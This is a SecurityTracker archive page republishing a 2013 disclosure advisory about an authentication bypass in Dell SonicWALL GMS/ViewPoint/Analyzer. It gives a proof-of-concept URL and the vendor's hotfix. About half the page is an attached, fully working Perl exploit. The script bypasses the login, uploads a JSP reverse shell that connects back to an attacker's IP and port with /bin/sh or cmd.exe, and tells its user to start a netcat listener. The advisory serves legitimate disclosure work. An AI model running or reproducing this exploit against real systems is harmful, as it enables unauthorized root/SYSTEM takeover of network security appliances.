SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Device (Encryption/VPN)  >   Dell SonicWALL Vendors:   SonicWALL
SonicWALL Global Management System Lets Remote Users Bypass Authentication
SecurityTracker Alert ID:  1028007
SecurityTracker URL:  http://securitytracker.com/id/1028007
CVE Reference:   CVE-2013-1359, CVE-2013-1360   (Links to External Site)
Date:  Jan 17 2013
Impact:   Modification of authentication information, Root access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): GMS 4.1.x, 5.0.x, 5.1.x, 6.0x, 7.0.x
Description:   Two vulnerabilities were reported in SonicWALL Global Management System. A remote user can bypass authentication to gain full control of the target system.

A remote user can send a specially crafted request to the UMA Interface with the parameter 'skipSessionCheck=1' to bypass authentication [CVE-2013-1359].

A demonstration exploit URL is provided:

http://[target]/appliance/applianceMainPage?action=status&skipSessionCheck=1

A remote user can send a specially crafted request to the SGMS Interface to exploit a password change flaw and bypass authentication [CVE-2013-1360].

The remote user can gain full administrative access.

The vendor was notified on December 13, 2012.

Nikolas Sotiriu reported this vulnerability.

Impact:   A remote user can gain full control of the target system.
Solution:   The vendor has issued a fix (Hotfix 125076.77).
Vendor URL:  www.sonicwall.com/ (Links to External Site)
Cause:   Access control error, Authentication error

Message History:   None.


 Source Message Contents

Subject:  NSOADV-2013-001: DELL SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/appliance/)


--Boundary_(ID_BKHJfQCHMwmRTt9harCHfw)
Content-type: text/plain; charset=ISO-8859-1
Content-transfer-encoding: 8BIT

______________________________________________________________________
-------------------------- NSOADV-2013-001 ---------------------------

SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/appliance/)
______________________________________________________________________
______________________________________________________________________

                               111101111
                        11111 00110 00110001111
                   111111 01 01 1 11111011111111
                11111  0 11 01 0 11 1 1  111011001
             11111111101 1 11 0110111  1    1111101111
           1001  0 1 10 11 0 10 11 1111111  1 111 111001
         111111111 0 10 1111 0 11 11 111111111 1 1101 10
        00111 0 0 11 00 0 1110 1 1011111111111 1111111 11  100
       10111111 0 01 0  1 1 111110 11 1111111111111  11110000011
       0111111110 0110 1110 1 0 11101111111111111011 11100  00
       01111 0 10 1110 1 011111 1 111111111111111111111101 01
       01110 0 10 111110 110 0 11101111111111111111101111101
      111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111
      111110110 10 0111110 1 0 0 1111111111111111111111111 110
    111 11111 1  1 111 1   10011 101111111111011111111 0   1100
   111 10  110 101011110010   11111111111111111111111 11 0011100
   11 10     001100     0001      111111111111111111 10 11 11110
  11110       00100      00001     10 1  1111  101010001 11111111
  11101        0  1011     10000    00100 11100        00001101 0
  0110         111011011             0110   10001        101 11110
  1011                 1             10 101   000001        01   00
   1010 1                              11001      1 1        101  10
      110101011                          0 101                 11110
            110000011
                      111
______________________________________________________________________
______________________________________________________________________

  Title:                  SonicWALL GMS/Viewpoint/Analyzer
                          Authentication Bypass (/appliance/)
  Severity:               Critical
  CVE-ID:                 CVE-2013-1359
  CVSS Base Score:        10
   Impact:                10
   Exploitability:        10
   CVSS2 Vector:          AV:N/AC:L/Au:N/C:C/I:C/A:C
  Advisory ID:            NSOADV-2013-001
  Found Date:             2012-04-26
  Date Reported:          2012-12-13
  Release Date:           2013-01-17
  Author:                 Nikolas Sotiriu
  Website:                http://sotiriu.de
  Twitter:                http://twitter.com/nsoresearch
  Mail:                   nso-research at sotiriu.de
  URL:                    http://sotiriu.de/adv/NSOADV-2013-001.txt
  Vendor:                 DELL SonicWALL (http://www.sonicwall.com/)
  Affected Products:      GMS
                          Analyzer
                          UMA
                          ViewPoint
  Affected Platforms:     Windows/Linux
  Affected Versions:      GMS/Analyzer/UMA 7.0.x
                          GMS/ViewPoint/UMA 6.0.x
                          GMS/ViewPoint/UMA 5.1.x
                          GMS/ViewPoint 5.0.x
                          GMS/ViewPoint 4.1.x
  Remote Exploitable:     Yes
  Local Exploitable:      No
  Patch Status:           Vendor released a patch (See Solution)
  Discovered by:          Nikolas Sotiriu



Background:
===========

distributed enterprises and service providers with a powerful and
intuitive solution to centrally manage and rapidly deploy SonicWALL
firewall, anti-spam, backup and recovery, and secure remote access
solutions. Flexibly deployed as software, hardware, or a virtual
appliance, SonicWALL GMS offers centralized real-time monitoring, and
comprehensive policy and compliance reporting. For enterprise customers,
SonicWALL GMS streamlines security policy management and appliance
deployment, minimizing administration overhead. Service Providers can
use GMS to simplify the security management of multiple clients and
create additional revenue opportunities. For added redundancy and
scalability, GMS can be deployed in a cluster configuration.

(Product description from Website)



Description:
============

DELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that
allows an unauthenticated, remote attacker to bypass the  Web interface
authentication offered by the affected product.

The vulnerability is attributed to a built-in function to skip the
session check of the web application.

An attacker may exploit this vulnerability by sending a request
to the UMA Interface (/appliance/) with the parameter
"skipSessionCheck=1".

The attacker gains full administrative access to the interface and
could execute code with root or SYSTEM permissions, which leads to
a full compromisation of the system.



Proof of Concept:
=================

http://host/appliance/applianceMainPage?action=status&skipSessionCheck=1

The remote Root/System exploit is attached.


Solution:
=========

Install Hotfix 125076.77. (Download from www.mysonicwall.com)



Disclosure Timeline:
====================

2012-04-26: Vulnerability found
2012-12-12: Sent the notification and disclosure policy and asked
            for a PGP Key (security@sonicwall.com)
2012-12-13: Sent advisory, disclosure policy and planned disclosure
            date (2012-12-28) to vendor
2012-12-18: SonicWALL analyzed the finding and wishes to delay the
            release to the 3. calendar week 2013.
2012-12-18: Changed release date to 2013-01-17.
2012-12-20: Patch is published
2013-01-17: Release of this advisory



--Boundary_(ID_BKHJfQCHMwmRTt9harCHfw)
Content-type: application/x-perl; name=sgmsRCE.pl
Content-transfer-encoding: 7bit
Content-disposition: attachment; filename=sgmsRCE.pl

#!/usr/bin/perl

##
#  Title:     SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit 
#  Name:      sgmsRCE.pl
#  Author:    Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de>
#
#  Use it only for education or ethical pentesting! The author accepts 
#  no liability for damage caused by this tool.
#  
##


use strict;
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;
use LWP::Protocol::https;
use Getopt::Std;


my %args;
getopt('hlp:', \%args);

my $victim    = $args{h} || usage();
my $lip	      = $args{l}; 
my $lport     = $args{p};
my $detect    = $args{d};
my $shellname = "cbs.jsp";

banner();

my $gms_path;
my $target;
my $sysshell;

my $agent = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0,},);
$agent->agent("Mozilla/5.0 (X11; Linux x86_64; rv:11.0) Gecko/20100101 Firefox/11.0");

# Place your Proxy here if needed
#$agent->proxy(['http', 'https'], 'http://localhost:8080/');

print "[+] Checking host ...\n";
my $request = POST "$victim/appliance/applianceMainPage?skipSessionCheck=1",
Content_Type => 'application/x-www-form-urlencoded; charset=UTF-8',
Content  => [   num => "123456",
                action => "show_diagnostics",
                task => "search",
		item => "application_log",
		criteria => "*.*",
		width => "500",
        ];

my $result = $agent->request($request);

if ($result->is_success) {
        print "[+] Host looks vulnerable ...\n";
} else {
        print "[-] Error while connecting ... $result->status_line\n";
	exit(0);
}


my @lines=split("\n",$result->content);

foreach my $line (@lines) {
	if ($line =~ /OPTION VALUE=/) {
		my @a=split("\"", $line);
		if ($a[1] =~ m/logs/i) {
			my @b=split(/logs/i,$a[1]);
			$gms_path=$b[0];
		}
                if ($gms_path ne "") {
			print "[+] GMS Path: $gms_path\n";
			last;
                } else {
			next;
                }
	}
}
if ($gms_path eq "") {
	print "[-] Couldn't get the GMS path ... Maybe not vulnerable\n";
	exit(0);
}


if ($gms_path =~ m/^\//) {
	$target="UNX";
	$gms_path=$gms_path."Tomcat/webapps/appliance/";
	$sysshell="/bin/sh";
	print "[+] Target ist Unix...\n";
} else {
	$target="WIN";
	$gms_path=$gms_path."Tomcat\\webapps\\appliance\\";
	$sysshell="cmd.exe";
	print "[+] Target ist Windows...\n";
}

&_writing_shell;

if (!$detect) {
print "[+] Uploading shell ...\n";
my $request = POST "$victim/appliance/applianceMainPage?skipSessionCheck=1",
Content_Type => 'multipart/form-data',
Content	 => [ 	action => "file_system", 
		task => "uploadFile", 
		searchFolder => "$gms_path", 
		uploadFileName => ["$shellname"]
	];

my $result = $agent->request($request);

if ($result->is_success) {
	print "[+] Upload completed ...\n";
} else {
	print "[-] Error while connecting ... $result->status_line\n";
	exit(0);
}

unlink("$shellname");

print "[+] Spawning remote root/system shell ...\n";
my $result = $agent->get("$victim/appliance/$shellname");

if ($result->is_success) {
        print "[+] Have fun ...\n";
} else {
        print "[-] Error while connecting ... $result->status_line\n";
	exit(0);
}
}

sub _writing_shell {
	open FILE, ">", "$shellname" or die $!;
        print FILE << "EOF";
<%\@page import="java.lang.*"%>
<%\@page import="java.util.*"%>
<%\@page import="java.io.*"%>
<%\@page import="java.net.*"%>
<%
        class StreamConnector extends Thread
        {
                InputStream is;
                OutputStream os;

                StreamConnector( InputStream is, OutputStream os )
                {
                        this.is = is;
                        this.os = os;
                }
                public void run()
                {
                        BufferedReader in  = null;
                        BufferedWriter out = null;
                        try
                        {
                                in  = new BufferedReader( new InputStreamReader( this.is ) );
                                out = new BufferedWriter( new OutputStreamWriter( this.os ) );
                                char buffer[] = new char[8192];
                                int length;
                                while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
                                {
                                        out.write( buffer, 0, length );
                                        out.flush();
                                }
                        } catch( Exception e ){}
                        try
                        {
                                if( in != null )
                                        in.close();
                                if( out != null )
                                        out.close();
                        } catch( Exception e ){}
                }
        }
        try
        {
                Socket socket = new Socket( "$lip", $lport );
                Process process = Runtime.getRuntime().exec( "$sysshell" );
                ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
                ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
        } catch( Exception e ) {}
%>

EOF

close(FILE);
}

sub usage {
    print "\n";
    print " $0 - SonicWALL GMS/VIEWPOINT/Analyzer Remote Root/SYSTEM exploit\n";
    print "====================================================================\n\n";
    print "  Usage:\n";
    print "           $0 -h <http://victim> -l <yourip> -p <yourport>\n";
    print "  Notes:\n";
    print "           Start your netcat listener <nc -lp 4444>\n";
    print "           -d only checks if the Host is vulnerable\n";
    print "\n";
    print "  Author:\n";
    print "           Nikolas Sotiriu (lofi)\n";
    print "           url: www.sotiriu.de\n";
    print "           mail: lofi[at]sotiriu.de\n";
    print "\n";


    exit(1);
}

sub banner {
        print STDERR << "EOF";
--------------------------------------------------------------------------------
       SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit
--------------------------------------------------------------------------------

EOF
}



--Boundary_(ID_BKHJfQCHMwmRTt9harCHfw)--
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC